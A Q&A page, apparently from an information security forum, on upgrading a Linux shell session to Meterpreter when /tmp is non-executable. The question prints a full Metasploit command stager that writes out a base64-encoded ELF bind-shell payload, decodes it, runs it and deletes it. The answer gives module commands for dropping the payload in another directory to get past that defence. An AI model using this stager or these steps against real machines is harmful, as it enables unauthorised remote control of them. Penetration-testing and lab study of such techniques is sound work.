Information Security Asked by h f on February 5, 2021
I am trying to achieve a meterpreter session on a test machine (the "victim") that I already have a shell session on. When I run the command sessions -u #
, where #
corresponds to the number of the shell session, I receive an error because metasploit tries to create and execute a payload on the victim in the /tmp
directory, which is set to be non-executable. In other words, nothing can be executed from the /tmp
directory on the victim machine.
Is there a way for me to specify where this executable file is created and executed on the victim machine?
linux/x86/meterpreter/bind_tcp
payload./tmp
and called something random such as abc123
, I would want to have the payload placed in a known location that allows execution such as /home/Bob
./home/Bob/abc123
, will then execute and start the meterpreter session.[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/FgFBP.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tDGmH' < '/tmp/FgFBP.b64' ; chmod +x '/tmp/tDGmH' ; '/tmp/tDGmH' ; rm -f '/tmp/tDGmH' ; rm -f '/tmp/FgFBP.b64'"]
Note the execution of the /tmp/tDGmH
file toward the end of the command… This is the part of the command that is failing for me due to the /tmp
directory being set to non-executable.
Could possibly involve making changes to this file: https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/bourne.rb
The sessions -u
is actually a post/multi/manage/shell_to_meterpreter
with predefined options. If you see the advanced options for that module (with show advanced
), you should notice it has:
Name Required Description ---- -------- ----------- BOURNE_FILE no Remote filename to use for dropped binary BOURNE_PATH no Remote path to drop binary PAYLOAD_OVERRIDE no Define the payload to use
Therefore, what you are trying to do should be possible with:
use post/multi/manage/shell_to_meterpreter
set SESSION 2
set BOURNE_PATH /home/Bob
set PAYLOAD_OVERRIDE linux/x86/meterpreter/bind_tcp
run
Answered by Esa Jokinen on February 5, 2021
Get help from others!
Recent Answers
Recent Questions
© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP